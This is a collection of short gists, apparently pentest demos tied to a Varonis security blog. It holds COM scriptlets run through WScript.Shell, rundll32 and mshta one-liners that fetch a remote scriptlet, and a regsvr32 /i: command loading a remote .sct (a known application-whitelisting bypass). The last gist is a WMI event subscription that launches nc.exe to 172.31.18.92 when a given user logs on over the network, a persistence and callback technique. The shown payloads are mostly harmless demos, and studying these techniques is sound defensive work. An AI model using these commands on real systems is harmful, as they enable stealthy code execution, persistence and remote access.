agreenjay

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
                    Version 2, December 2004

 Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE>

 Everyone is permitted to copy and distribute verbatim or modified
 copies of this license document, and changing it is allowed as long
 as the name is changed.

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE

agreenjay

write-host "Watching GIF animations showing JavaScript malware launched from an ADS"
start-sleep -seconds 2
write-host "can be strangely compelling."
write-host -seconds 4
write-host "You'll want to watch this video over and over "
start-sleep -seconds 4
write-host "and over. And now you have an uncontrollabe urge to click the CTA."
start-sleep -seconds 3
write-host "The one that says Free Varonis Demo!"

agreenjay

write-host "Watching GIF animations showing JavaScript malware launched from an ADS"
start-sleep -seconds 4
write-host "can be strangely compelling."
start-sleep -seconds 4
write-host "You'll want to watch this video over and over "
start-sleep -seconds 5
write-host "and over. And now you have an uncontrollabe urge to click the CTA."
start-sleep -seconds 3
write-host "The one that says Free Varonis Demo!"

agreenjay

<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
    ![CDATA[        
     var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>

agreenjay

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
  
	var r = new ActiveXObject("WScript.Shell").Run("powershell -noe -nop write-host");

agreenjay

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
        window.alert("hello");
       

agreenjay

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
        
        var r = new ActiveXObject("WScript.Shell").Run("powershell -noe write-host Booo!");

agreenjay

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("echo If you see this message, you need to review your security. See blog.varonis.com for answers"); 
    ]]>
</script>

agreenjay

regsvr32 /s /n /u /i:https://gist.githubusercontent.com/agreenjay/c6cc5066b453b909f5ae0542504c1b6e/raw/c58b9f4fe3ac5251630a2948222cd8909e6ce1dc/scripty2.sct

agreenjay

Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}}